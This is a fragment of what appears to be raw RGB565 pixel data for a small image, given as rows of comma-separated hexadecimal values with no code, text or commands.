0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
